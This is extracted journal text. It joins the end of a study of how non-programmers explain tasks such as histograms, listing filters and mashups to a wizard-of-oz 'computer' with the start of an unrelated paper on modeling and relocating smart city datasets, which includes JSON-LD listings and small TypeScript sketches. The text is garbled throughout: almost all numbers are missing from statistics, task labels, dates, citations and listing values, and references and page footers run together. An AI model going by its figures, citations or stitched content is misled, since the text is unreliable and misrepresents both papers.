figure : an example drawing of task . participants were asked to explain how to draw a histogram of the numbers in the table. in this example, the participant gave the histogram bins different codes (a–d) and marked each number with the codes. since the participant could not put one of the numbers into any bin, he marked it with a question mark and a line pointing to a missing bin.

table : task material. in task , the participants were asked to create a filter that removes houses with fewer than three bedrooms from housing rental posts scraped from http://craigslist.com. prompt: ''you want to create a filter that removes houses having less than bedrooms. how would you explain it to the computer?'' sample postings:
• brand new townhome! $ , / br — ft — (clarksburg)
• lanham / new deck $ , / ft — (lanham)
• bedrooms lvl townhome $ , / br — (md)
• comer square bel air, md $ , / studio
... ( more) ...

procedure

each session began with a brief interview about the participant's programming experience and occupational background. the interviewer introduced the wizard-of-oz method and gave an exercise task: ordering the interviewer (acting as the hypothetical computer agent) to move a cup to another corner of the table. after participants said they fully understood the concept of the hypothetical computer agent, we started the actual study by introducing the three scenarios in a randomized order. for each scenario, participants were asked to explain the task to the ''computer.'' participants were allowed to finish or to give up a task at any point.

figure : an example drawing of task . in this example, the participant used scribbles along with verbal statements. for example, the participant wrote variations of the keywords that indicate ''bedroom'' used in the list. he/she also circled and underlined the number of rooms in each title to demonstrate the text extraction logic, crossed out titles that did not meet the criteria, and drew arrows from houses to empty slots in the list.

data and analysis

the entire session was video recorded and transcribed for qualitative analysis.
the transcript of each task consists of a sequence of conversational dialogue between the participant and the interviewer, finger and mouse pointing gestures, scribbles on the paper (figs. and ; only for tasks and ), and page scroll and mouse events in the browser (only for task ). to analyze the transcripts, the first author created an initial codebook derived from the literature (pane, myers & ratanamahatana, ) and an initial post-interview discussion within the research team. the codebook captured how the participants described the tasks and what challenges they experienced. while repeating the coding process, a few categories emerged: programming styles, imperative commands, ambiguities, and multi-modal intent.

figure : task material. in task , participants were asked to describe a simple mashup program that shows the available colors of each individual product in the main page, extracted from the product detail page.

findings

in this section we characterize how non-programmers describe computational tasks. participants were allowed to stop at any moment, but all of them could eventually complete the tasks with the computer's help. each task took an average of . s (sd = . ). we did not observe any fatigue effect. since participants had very limited understanding of the computer at the beginning, most of their initial explanations were not very informative. thus the computer asked for further information, as in the examples below.

(task . histogram)
p : wouldn't computers draw the graph when numbers are assigned? i'm asking because i have no idea.
p : find the numbers, and draw them at the first bin.
computer: how can i draw them?
p : what should i tell? color?

(task . custom filter)
p : first, i scan the list with my eyes and exclude them. they clearly stand out.
computer: how do they stand out?
p : i'd order, ''exclude houses with one or two bedrooms.''
computer: how can i know the number of bedrooms?

(task . mash up)
p : i'd ask the computer to show available colors of this columbia shirt.
computer: where can i get available colors?

natural language tends to be underspecified and ambiguous (pane, myers & ratanamahatana, ). we frequently observed that our participants skipped mentioning essential information. for example, most participants did not specify how to iterate over multiple elements in a list. they instead demonstrated handling the first item and expected the computer to automatically repeat the same process for the rest of the items. they did not refer to objects by name the way programmers use variables. however, they referred to previously mentioned objects by their actual values (underlined in the following example), as p said, ''in this next column, we need items going , , and . so please find those , , , and draw a bar in this column.'' they also used pronouns (e.g., ''remove them''), data types (e.g., ''attach colors''), and gestures (e.g., ''paste them here''). while loops and variable referencing are core concepts of programming languages, our findings suggest that non-programmers would find them unnecessary or even unnatural. we will discuss the issue further, with design implications for future eup systems, in the discussion section. through conversational dialogues, participants figured out what information the computer requires and how to explain it.
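to illustrate the kind of rule these dialogues converge toward, the following typescript sketch (our own illustration, assuming a simplified posting format) implements the logic of task : extract a bedroom count from each posting title and remove postings with fewer than three bedrooms. the regular expression is a hypothetical simplification of the keyword variations participants actually encountered (e.g., ''br,'' ''bedroom(s)'').

// a minimal sketch of the task 2 filter: keep only postings with three or more bedrooms.
// the pattern below is a simplified, assumed format; real craigslist titles vary much more.
const bedroomPattern = /(\d+)\s*(?:br|bedrooms?)/i;

function bedroomCount(title: string): number | null {
  const match = title.match(bedroomPattern);
  return match ? parseInt(match[1], 10) : null; // null when no bedroom info is recognized
}

function filterPostings(titles: string[], minBedrooms: number): string[] {
  // postings whose bedroom count cannot be extracted are kept, mirroring a cautious default
  return titles.filter((t) => {
    const count = bedroomCount(t);
    return count === null || count >= minBedrooms;
  });
}

// usage example with hypothetical titles
const postings = [
  "brand new townhome! 3 br (clarksburg)",
  "cozy 1 bedroom near metro",
  "4 bedrooms lvl townhome (md)",
];
console.log(filterPostings(postings, 3)); // drops the 1-bedroom posting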
we found a few characteristics of how non-programmers explain computational tasks, as listed below.

explaining with rules and examples was used by of the participants. when participants explained rules first, the following examples usually provided information that the rules were potentially missing. for example, while drawing a histogram for task , p stated a rule, ''determine which bin each number is in,'' followed by an example, ''if the number is one (pointing at the first item in the table), then count up this bin (pointing at the first bin in the histogram).'' participants also provided examples first, and then explained the rules. p , doing task , gave all the numbers ( , , and ) for the first bin, ''for here (pointing at the first column) we need , , and ,'' and then explained the range of those numbers, ''find numbers including zero, smaller than two.'' traditional programming languages rarely allow example-based programming. although eup systems often support programming-by-example (pbe) techniques, they do not allow this pattern: combining rules and examples to describe individual functional elements.

elaborating a general statement through iteration was observed for every participant. initial explanations of tasks were usually top-level actions (e.g., draw bars, remove houses, attach pictures) that contained a variety of ambiguities, but participants then iteratively elaborated the statements by adding more details. for example, p , doing task , described the top-level action, ''attach pictures here.'' then he elaborated where the pictures were taken from, ''attach pictures from the pages.'' he kept on elaborating what the pages are and how to extract pictures from the pages. for task , as another example, p told the computer, ''draw a graph.'' she then rephrased the statement with more details, ''draw a graph to number .'' this pattern is far from traditional programming languages, which expect users to create statements in the order of their execution.

multi-modal expressions including gestures and scribbles were frequently used by all participants. while verbal statements were still the central part of explanation, they used gestures along with pronouns (e.g., ''count these,'' ''put them here'') and scribbles to supplement verbal statements, as in the example in fig. . while multi-modal expressions seem to be natural and effective for non-programmers, traditional programming environments rarely support them.

rationales are not direct instructions for the computer; nevertheless, we consistently observed participants explaining rationales. for example, p , doing task , explained why she chose to attach small color chips rather than larger images, ''while we can show images, which would be quite complex, i'd want you to use color boxes.'' p also explained the rationale of her scribbles on the sheet of task , ''we can also secretly write the number here (center of each cell) to remember, so track for afterward so we didn't make any mistake.''

discussion

this user study provides characteristics of non-programmers explaining how they would solve computational tasks. given that traditional programming environments do not fully support the way these participants conceptualized their solutions, we discuss the implications for the design of multi-modal and mixed-initiative approaches for making end-user programming more natural and easy to use for these users.
our recommendations are to:

allow end-users to express ideas with combinations of rules, examples, gestures, and rationales. a common pattern of multi-modal intent expression is to generate rules (i.e., program modules) from examples or demonstrations, and to allow users to review and modify those rules (kandel et al., ; le, gulwani & su, ; yessenov et al., ). in such systems, different modalities have separate roles. our user study, in contrast, suggests that rules, examples, and rationales can be highly effective when used in combination. future eup systems should give end-users more flexibility to express their intent via multi-modality.

support iterative refinement of programs. it is well known that end-users may not be able to provide complete information about the programs they want (lau, ). we observed that users would start with a quick and brief description of task outlines, goals, or solutions that handle only a subset of the potential scenarios, and then iteratively refine it by adding more rules and examples. many pbe systems (gulwani, ) allow users to provide additional examples for disambiguation, and some even suggest critical examples (mayer et al., ).

support mixed-initiative interaction to disambiguate user intent. to guide non-programmers to explain essential information such as loops and variable referencing, our study employed conversational dialogue (as explained in 'method') between participants and the computer. for example, when participants gave incomplete statements (e.g., a demonstration for only the first item), the computer asked them for additional information (''what would you like to do for the rest of the items?'') or confirmation (e.g., ''do you want to do the same for the rest of the items?''). likewise, future eup tools should incorporate mixed-initiative interaction to help end-users express unambiguous statements, although how the computer and end-users establish mutual understanding remains an open research question.

we made several simplifying assumptions that limit the scope of our findings. first, the computer followed three informal rules rather than a formal definition of its behavior and abilities, which may not be specific enough to design a working system; a formal set of rules would make the wizard-of-oz study stronger. second, participants could not see or test the programs they were building, which is uncommon for any programming environment. the next step is to study similar questions with a fully interactive system that provides generated programs and test results. third, the three tasks do not represent the full spectrum of computational tasks. however, as with the first study, we believe that even this narrow analysis provides useful insights that could guide the design of a new webeup system. finally, future work should include a functioning system that presents and tests solutions addressing the challenges and implications of this study.

conclusion

this paper reports results from two user studies that help to better understand the needs and capabilities of web end-users. the first study, a semi-structured interview study, explores challenges that end-users experience daily, and identifies seven categories of enhancements that we believe would be helpful to include in future eup tools.
the second, a wizard- of-oz study, demonstrates how non-programmers explain common computational tasks and provides design ideas for more natural programming environments. finally future work should build an interactive research prototype based on the findings, and test with real end-users. additional information and declarations funding the authors received no funding for this work. competing interests benjamin bederson is an academic editor for peerj. author contributions • tak yeon lee conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • benjamin b. bederson reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): irbnet @ university of maryland college park (umcp), project id and title: [ - ] survey about web inefficiencies. project was declared exempt from irb review. data availability the following information was supplied regarding data availability: the raw data has been supplied supplemental information . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references biermann aw, ballard bw, sigmon ah. . an experimental study of natural language programming. international journal of man-machine studies : – doi . /s - ( ) - . blackwell a, burnett m. . applying attention investment to end-user programming. in: proceedings of the ieee symposia on human centric computing languages and environments, . piscataway: ieee, – doi . /hcc. . . bogart c, burnett m, cypher a, scaffidi c. . end-user programming in the wild: a field study of co scripter scripts. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . piscataway: ieee, – doi . /vlhcc. . . bolin m, webber m, rha p, wilson t, miller rc. . automation and cus- tomization of rendered web pages. in: uist’ . new york: acm, – doi . / . . braun v, clarke v. . using thematic analysis in psychology. qualitative research in psychology : – doi . / qp oa. cameron jm, churchill ef. . conversations in developer communities: a pre- liminary analysis of the yahoo! pipes community. in: proceedings of the fourth international conference on communities and technologies. new york: acm, – . cao j, rector k, park th, fleming sd, burnett m, wiedenbeck s. b. a debugging perspective on end-user mashup programming. in: ieee symposium on visual languages and human-centric computing (vl/hcc). piscataway: ieee, – doi . /vlhcc. . . cao j, riche y, wiedenbeck s, burnett m, grigoreanu v. a. end-user mashup programming: through the design lens. in: chi ’ . new york: acm, – doi . / . . cheema s, gulwani s, laviola j. . quickdraw: improving drawing expe- rience for geometric diagrams. in: chi ’ . new york: acm, – doi . / . . chia ph, yamamoto y, asokan n. . is this app safe? a large scale study on application permissions and risk signals. in: proceedings of the st interna- tional conference on world wide web. www ’ . new york: acm, – doi . / . . corritore cl, kracher b, wiedenbeck s. . on-line trust: concepts, evolving themes, a model. international journal of human-computer studies : – doi . /s - ( ) - . 
cypher a, dontcheva m, lau t, nichols j. . no code required: giving users tools to transform the web. san francisco: morgan kaufmann publishers inc. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /hcc. . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / qp oa http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. cypher a, halbert dc, kurlander d, lieberman h, maulsby d, myers ba, turransky a (eds.) . watch what i do: programming by demonstration. cambridge: mit press. ennals r, brewer e, garofalakis m, shadle m, gandhi p. . intel mash maker: join the web. sigmod record : – doi . / . . fischer g, giaccardi e. . meta-design: a framework for the future of end-user development. in: lieberman h, paternó f, wulf v, eds. end user development. netherlands: springer, – . goldstein dg, mcafee rp, suri s. . the cost of annoying ads. in: proceedings of the nd international conference on world wide web. www ’ . republic and canton of geneva: international world wide web conferences steering committee, – . gulwani s. . dimensions in program synthesis. in: ppdp’ . new york: acm, – doi . / . . gulwani s. . automating string processing in spreadsheets using input–output examples. sigplan notices : – doi . / . . hruschka dj, schwartz d, st john dc, picone-decaro e, jenkins ra, carey jw. . reliability in coding open-ended data: lessons learned from hiv behavioral research. field methods : – doi . / x . kandel s, paepcke a, hellerstein j, heer j. . wrangler: interactive visual specifi- cation of data transformation scripts. in: chi ’ . new york: acm, – doi . / . . ko aj, abraham r, beckwith l, blackwell a, burnett m, erwig m, scaffidi c, lawrance j, lieberman h, myers b, rosson mb, rothermel g, shaw m, wiedenbeck s. . the state of the art in end-user software engineering. acm computing surveys : – – : doi . / . . kuttal sk, sarma a, rothermel g. . history repeats itself more easily when you log it: versioning for mashups. in: ieee symposium on visual lan- guages and human-centric computing (vl/hcc). piscataway: ieee, – doi . /vlhcc. . . kuttal sk, sarma a, rothermel g. . on the benefits of providing versioning support for end users: an empirical study. acm transactions on computer-human interaction : : – : doi . / . lau t. . why pbd systems fail: lessons learned for usable ai. in: chi , april – april , , florence, italy. new york: acm,. le v, gulwani s, su z. . smartsynth: synthesizing smartphone automation scripts from natural language. in: mobisys ’ . new york: acm, – doi . / . . leshed g, haber em, matthews t, lau t. . coscripter: automating & sharing how-to knowledge in the enterprise. in: chi ’ . new york: acm, – doi . / . . lieberman h. . your wish is my command: programming by example. san francisco: morgan kaufmann. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / x http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. macías ja, fabio p. . 
customization of web applications through an intelligent environment exploiting logical interface descriptions. interacting with computers : – doi . /j.intcom. . . . mayer m, soares g, grechkin m, le v, marron m, polozov a, singh r, zorn b, gulwani s. . user interaction models for disambiguation in programming by example. in: th acm user interface software and technology symposium. new york: acm. miller la. . programming by non-programmers. international journal of man- machine studies : – doi . /s - ( ) - . miller la. . natural language programming: styles, strategies, and contrasts. ibm systems journal : – doi . /sj. . . miller rc, chou vh, bernstein m, little g, van kleek m, karger d, schraefel m. . inky: a sloppy command line for the web with rich visual feedback. in: proceedings of the st annual acm symposium on user interface software and technology. new york: acm, – . nichols j, lau t. . mobilization by demonstration: using traces to re-author existing web sites. in: iui ’ . new york: acm, – doi . / . . ott m, cardie c, hancock j. . estimating the prevalence of deception in online review communities. in: www ’ . new york: acm, – doi . / . . ott m, choi y, cardie c, hancock jt. . finding deceptive opinion spam by any stretch of the imagination. in: proceedings of the th annual meeting of the association for computational linguistics: human language technologies - volume . hlt ’ . stroudsburg: association for computational linguistics, – . pane jf, myers ba, ratanamahatana ca. . studying the language and structure in non-programmers’ solutions to programming problems. international journal of human-computer studies : – doi . /ijhc. . . rinard mc. . example-driven program synthesis for end-user programming: techni- cal perspective. communications of the acm : – doi . / . . rosson mb, ballin j, rode j. . who, what, and how: a survey of informal and professional web developers. in: ieee symposium on visual languages and human-centric computing. piscataway: ieee, – doi . /vlhcc. . . toomim m, drucker sm, dontcheva m, rahimi a, thomson b, landay ja. . attaching ui enhancements to websites with end users. in: chi ’ . new york: acm, – doi . / . . tuchinda r, szekely p, knoblock ca. . building data integration queries by demon- stration. in: iui ’ . new york: acm, – doi . / . . tuchinda r, szekely p, knoblock ca. . building mashups by example. in: iui ’ . new york: acm, – doi . / . . wong j, hong ji. . making mashups with marmite: towards end-user programming for the web. in: chi ’ . new york: acm, – doi . / . . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /sj. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /ijhc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. wong j, hong j. . what do we ‘‘mashup" when we make mashups? in: proceedings of the th international workshop on end-user software engineering. weuse ’ . new york: acm, – doi . / . . yessenov k, tulsiani s, menon a, miller rc, gulwani s, lampson b, kalai a. . a colorful approach to text processing by example. in: uist’ . new york: acm, – doi . / . . zang n, rosson mb. . what’s in a mashup? and why? studying the percep- tions of web-active end users. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . 
piscataway: ieee, – doi . /vlhcc. . . zang n, rosson mb. a. web-active users working with data. in: chi ’ extended abstracts on human factors in computing systems. chi ea’ . new york: acm, – doi . / . . zang n, rosson mb. b. playing with information: how end users think about and integrate dynamic data. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . piscataway: ieee, – doi . /vlhcc. . . zang n, rosson mb, nasser v. . mashups: who? what? why? in: chi ea’ . new york: acm, – doi . / . . zimmerman j, rivard k, hargraves i, tomasic a, mohnkern k. . user-created forms as an effective method of human-agent communication. in: chi ’ . new york: acm, – doi . / . . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. submitted january accepted april published may corresponding author johannes m. schleicher, schleicher@dsg.tuwien.ac.at academic editor chee shin yeo additional information and declarations can be found on page doi . /peerj-cs. copyright schleicher et al. distributed under creative commons cc-by . open access modeling and management of usage- aware distributed datasets for global smart city application ecosystems johannes m. schleicher , michael vögler , christian inzinger and schahram dustdar distributed systems group, tu wien, vienna, austria software evolution & architecture lab, university of zürich, zürich, switzerland abstract the ever-growing amount of data produced by and in today’s smart cities offers significant potential for novel applications created by city stakeholders as well as third parties. current smart city application models mostly assume that data is exclusively managed by and bound to its original application and location. we argue that smart city data must not be constrained to such data silos so that future smart city applications can seamlessly access and integrate data from multiple sources across multiple cities. in this paper, we present a methodology and toolset to model available smart city data sources and enable efficient, distributed data access in smart city environments. we introduce a modeling abstraction to describe the structure and relevant properties, such as security and compliance constraints, of smart city data sources along with independently accessible subsets in a technology-agnostic way. based on this abstraction, we present a middleware toolset for efficient and seamless data access through autonomous relocation of relevant subsets of available data sources to improve quality of service for smart city applications based on a configurable mechanism. we evaluate our approach using a case study in the context of a distributed city infrastructure decision support system and show that selective relocation of data subsets can significantly reduce application response times. subjects distributed and parallel computing, software engineering keywords smart city application engineering, data management, data migration, quality of service introduction sparked by the rapid adoption of the smart city paradigm and fueled by the rise of the internet of things, today’s metropolises have become data behemoths. with every day that passes more and more areas of cities around the globe start accumulating and producing data. 
these areas cover building management, traffic and mobility systems, energy grids, water and pollution management, governance, social media, and many more. this plethora of heterogeneous data about various aspects of a city represents a vital foundation for decision and planning processes in smart cities. the advent of more and more open data initiatives around the globe, covering cities like london (https://data.london.gov.uk/), vienna (https://open.wien.gv.at/site/open-data/), new york (https://nycopendata.socrata.com/), and many more, underlines the importance of opening up data to the public to inspire and support novel applications. even though these initiatives are gaining momentum, they still only cover a fraction of the available data of a city, missing many vital sources, especially when it comes to more sensitive areas like building management, energy grids, or public transport guidance systems. currently, this data is mostly isolated and restricted to certain application areas, data centers, organizations, or only accessible in a specific city. this isolation creates data silos, which lead to transitive restrictions that apply to the models and applications that build upon them, confining them to their initial application domains. today's smart cities, however, represent heterogeneous, dynamic, and complex environments that rely on emerging interactions in order to operate effectively. these interactions are an essential element of smart city applications (schleicher et al., a) and are not only important in an intracity context, but also a key element to enable the future internet of cities (schleicher et al., b), an interconnected system of systems that spans multiple cities around the globe. to pave the way for such applications, we need to break up the traditional notion of data silos to enable ubiquitous access to the valuable data they contain. in the context of smart cities, an approach is required that respects the complexities of this domain, specifically the need to effectively describe a large variety of heterogeneous data sources along with relevant subsets. additionally, it has to be able to capture important data set characteristics (e.g., size, update frequency, costs), respect essential security and compliance constraints, and ensure efficient and seamless data access.

in this paper, we present smart distributed datasets (sdd), a methodology and framework to enable transparent and efficient distributed data access for data sources in smart city environments. we introduce a system model that provides a simple abstraction for the technology-agnostic description of data sources and their subsets, with the ability to express varying data granularities and specific characteristics common in the smart city domain.
based on this abstraction, we present the sdd framework, a middleware toolset that enables efficient and seamless data access for smart city applications by autonomously relocating relevant subsets of available data sources to improve quality of service (qos), based on a configurable mechanism that considers request latency as well as costs for data transfer, storage, and updates. we provide a proof-of-concept implementation of the sdd framework and evaluate it using a case study in the context of a distributed city infrastructure decision support system. for this case, we show that selective relocation of data subsets using the sdd framework can significantly improve qos by reducing response times by % on average.

the remainder of this paper is structured as follows. in 'motivation' we present a motivating scenario and identify the associated key requirements. we introduce the system model underlying sdd in 'system model' and present the sdd framework along with a detailed discussion of its components in 'the sdd framework'. in 'evaluation' we evaluate our approach using a case study from the smart city domain. related work is discussed in 'related work', followed by a conclusion and outlook on future research in 'conclusion'.

motivation

in this paper, we base our discussion on our recent smart city research within urbem (http://urbem.tuwien.ac.at), a research initiative of the city of vienna and tu wien. within urbem, we proposed the smart city application ecosystem (scale) (schleicher et al., a), shown in fig. , as a streamlined way for modeling, engineering, and operating future smart city applications based on a common abstraction, the smart city operating system (sos) (vögler et al., ). the aim of scale is to enable stakeholders, citizens, and practitioners in a smart city environment to build novel kinds of applications that can utilize the newfound capabilities emerging through the iot, as well as access the massive amounts of data emitted by the city in an efficient way. using scale, we created the urbem smart city application (usca) (schleicher et al., c), a holistic, interdisciplinary decision support system for the city of vienna and a number of key stakeholders.

figure : the smart city application ecosystem with the smart city operating system at its core.

we argue that such applications will evolve to become composable, interchangeable abstractions of capabilities similar to the applications known from today's smartphones, but on a much larger scale. this evolution in turn is an essential step towards the so-called internet of cities (schleicher et al., b), an open and dynamic marketplace where applications can seamlessly interact and be exchanged between cities around the globe.
to enable these applications as well as this vital open exchange, it is essential to provide means to expose and access data in an efficient, secure, and predictable way. currently, most of the data in a smart city context is confined to certain application areas and stakeholder data centers within a specific city. open data initiatives around the globe, while crucial, still only expose a certain fraction of the available data, missing out on many important domains, especially when data is stored in legacy systems without openly accessible interfaces or is subject to strict security and compliance constraints. this data lies dormant beyond its initial use case even though it could provide essential input for a wide range of smart city applications. the ability to benefit from incorporating new data sources as they evolve, for example to enhance decision support and planning, or to be applied to new cities or novel domains, is hindered by the inability of these applications to access the necessary data. developers of smart city applications, however, need to be able to utilize and integrate as much relevant data as possible to generate maximum user benefit as well as applicability in as many cities as possible. stakeholders, on the other hand, as willing as they might be to expose this data, are mostly bound by the complex constraints of their specific environment. the dynamic, emergent nature of interactions in and between smart city applications means that stakeholders are not a priori aware that their data sources might become valuable assets if made accessible. this leads to a problematic stalemate between practitioners and stakeholders in the smart city domain, hindering essential innovation and application. to overcome this impasse, a mechanism is required that enables flexible, stable, and efficient data access, while providing a simple and tailored way to make data sources available that still respects security and compliance constraints. specifically, we identify the following requirements in the context of our domain:
• the ability to describe data sources using an evolvable and technology-agnostic abstraction.
• the ability to describe subsets of these data sources along with relevant characteristics in the context of security, compliance, and costs (e.g., the effort to generate, store, query, and update particular subsets or the underlying data source as a whole).
• an efficient way to access this data in a transparent way, independent of geographic location, while still improving qos.

system model

in order to address the previously outlined requirements, we need an abstraction to model and describe the relevant data entities in our domain. as a foundation for this abstraction we use madcat (inzinger et al., ) and its extensions, which we introduced in smart fabric (schleicher et al., a). we presented an infrastructure-agnostic deployment model with the following abstract concepts: technical units (tus) to describe applications as well as application components, infrastructure specifications (is) to describe infrastructure resources, deployment units (dus) to describe how to deploy a tu on an is, and deployment instances (dis) to represent such actual deployments. in this paper, we extend this model with the ability to describe and incorporate data entities from the smart city domain.
specifically, we introduce the additional concepts of data units (daus) to model data sources, as well as data instances (dais) to describe specific deployments of daus on certain dis, along with the ability to link tus to daus. additionally, we provide an implementation of the abstract concepts along with the proposed methodology extensions for the sdd framework. we again choose json-ld (http://json-ld.org/) as the data format for our concept descriptions, as a simple, both human- and machine-readable, pragmatic, and extensible representation that also allows us to interlink the relevant concepts with each other. figure shows an overview of all concepts, including the relations of the newly introduced dau and dai (shown in blue) to the previously existing concepts deployment instance (di) and technical unit (tu). in the following, we discuss the introduced concepts in more detail.

figure : relations between technical unit, deployment unit, infrastructure specification, and deployment instance, including the newly introduced data unit and data instance.

data unit

daus describe data sources including their subsets. listing shows an example of such a dau for a buildings data source in the urbem domain. as a json-ld document, a dau can start with a context to set up common namespaces. this is followed by the type attribute to identify the corresponding kind of abstraction in our model space. the next attribute is the name, a urn identifying the unit, along with a version attribute enabling versioning and therefore evolvable daus. the creationdate and lastupdate attributes define when the unit description was initially created and last updated, respectively. the next section is metainformation about the described data source. it contains a type attribute that defines the type of the data source; types can be rest, soap, any database, streaming, or file based. in our example listing it is used to describe a document-oriented mongodb (https://www.mongodb.com/) based data source. the schema attribute can link to a corresponding schema, which, depending on the type, can be, for example, a sql schema, a json schema, a wadl (https://www.w3.org/submission/wadl/) or a wsdl (https://www.w3.org/tr/wsdl) description. the next attribute is securityconstraints, which in this section is used to define who is allowed to access the unit file. a security constraint can be a link to an oauth (https://oauth.net/) authority, an ldap distinguished name (dn), or any other corresponding authentication and authorization scheme. this is a vital element to ensure that the compliance and security constraints of this domain can be met at any level of detail, and it is used again when describing specific facets of a data source. the last element in the metainformation section is the dataunits attribute, which allows a dau to be linked to other corresponding daus, enabling the description of linked data sources. the next section, views, allows multiple facets of the data source to be expressed, enabling fine-grained control over its aspects.
each view has a name attribute for identification, as well as a link attribute that expresses how to access it; in our example this is a url to the corresponding rest resource. the next section within a view is the updatefrequency. it expresses how often a view is updated (period, times), how long such an update takes (updatetime), and how much of the resource an update represents (fraction). the size attribute gives an indication of the expected size of the view. this is followed by a securityconstraints attribute, which again can be a set of links to a corresponding authentication or authorization scheme supporting the previously mentioned methods. in this section it is used to express security and compliance constraints for specific fractions of a data source, which allows for a very fine-grained level of control. the last attribute in a view is the datainstances attribute, which links the view and its corresponding dau to one or more data instances (dais) by referencing their names.

listing : data unit—structure
{
  "@context": "http://smartfabric.dsg.tuwien.ac.at",
  "@type": "dataunit",
  "name": "urn:buildings:vienna",
  "version": " . ",
  "creationdate": " - - : : + ",
  "lastupdate": " - - : : + ",
  "metainformation": {
    "type": "nosql:mongodb",
    "schema": "http://sdd.dsg.tuwien.ac.at/urbem/vienna/buildings",
    "securityconstraints": [{
      "type": "ldap",
      "url": " . . . ",
      "dn": "cn=buildings -vienna",
      ...
    }],
    "dataunits": [...]
  },
  "views": [{
    "name": "urn:buildings:vienna:buildingblocks",
    "link": "/buildingblocks/",
    "updatefrequency": {
      "period": "yearly",
      "times": " ",
      "fraction": " ",
      "updatetime": " "
    },
    "size": " ",
    "securityconstraints": [...],
    "datainstances": [...]
  }, {
    "name": "urn:buildings:vienna:buildings",
    "link": "/buildings/",
    ...
  }]
}

data instance

a dai represents a specific deployment of a dau on a di. there can be multiple dais for a dau representing different deployed views, where a specific dai contains a subset of the views specified in the dau, i.e., dai ∈ p(dau). a dai specifies context, type, name, and version, as well as a dataunit attribute to reference the corresponding dau. this is followed by creationdate and lastupdate attributes to define when the instance was created and last updated. the next attribute is deploymentinstance, which contains a di name and is used to link the dai to a corresponding di. finally, the metainformation element allows additional information about the specific data instance to be stored in an open key-value format that can later be used by the framework components to support transfer decisions; examples would be the accessfrequency of this specific dai or other non-functional characteristics.

listing : data instance—structure
{
  "@context": "http://smartfabric.dsg.tuwien.ac.at",
  "@type": "datainstance",
  "dataunit": "urn:buildings:vienna",
  "name": "urn:buildings:vienna:buildingblocks",
  "version": " . ",
  "creationdate": " - - : : + ",
  "lastupdate": " - - : : + ",
  "deploymentinstance": "citizeninformationsystem/dedicatedserver",
  "metainformation": {...}
}

for further information regarding the elements of a tu, du, di, and is, as well as dau and dai, we provide detailed example representations of all of them in the corresponding bitbucket repository (https://bitbucket.org/jomis/smartdata).
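as an illustration of how these documents could be consumed programmatically, the following typescript interfaces sketch one possible typing of the dau and dai concepts. this is our own sketch: the field names mirror the listings above, but the attribute types (e.g., numeric size and fraction values) are assumptions, since the listings do not show concrete values.

// a sketch of the dau/dai structure described above; field types are assumptions.
interface SecurityConstraint {
  type: string;          // e.g., "ldap" or "oauth"
  url?: string;
  dn?: string;           // ldap distinguished name, when applicable
}

interface UpdateFrequency {
  period: string;        // e.g., "yearly"
  times: number;         // how often per period the view is updated
  fraction: number;      // share of the view affected by one update
  updateTime: number;    // duration of one update
}

interface View {
  name: string;          // urn identifying the view
  link: string;          // how to access the view, e.g., a rest path
  updateFrequency: UpdateFrequency;
  size: number;
  securityConstraints: SecurityConstraint[];
  dataInstances: string[];     // names of dais deploying this view
}

interface DataUnit {
  "@context": string;
  "@type": "DataUnit";
  name: string;
  version: string;
  creationDate: string;
  lastUpdate: string;
  metaInformation: {
    type: string;              // e.g., "nosql:mongodb"
    schema?: string;
    securityConstraints: SecurityConstraint[];
    dataUnits: string[];       // linked daus
  };
  views: View[];
}

interface DataInstance {
  "@context": string;
  "@type": "DataInstance";
  dataUnit: string;            // name of the dau this instance deploys
  name: string;
  version: string;
  creationDate: string;
  lastUpdate: string;
  deploymentInstance: string;  // name of the di hosting this dai
  metaInformation: Record<string, unknown>; // open key-value data, e.g., access frequency
}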
the sdd framework

in this section, we introduce the sdd framework for enabling usage-aware distributed datasets, addressing the previously introduced requirements. we begin with a framework overview, followed by a detailed description of all framework components, and conclude with a comprehensive description of our proof-of-concept implementation.

figure : sdd framework overview.

framework rationales

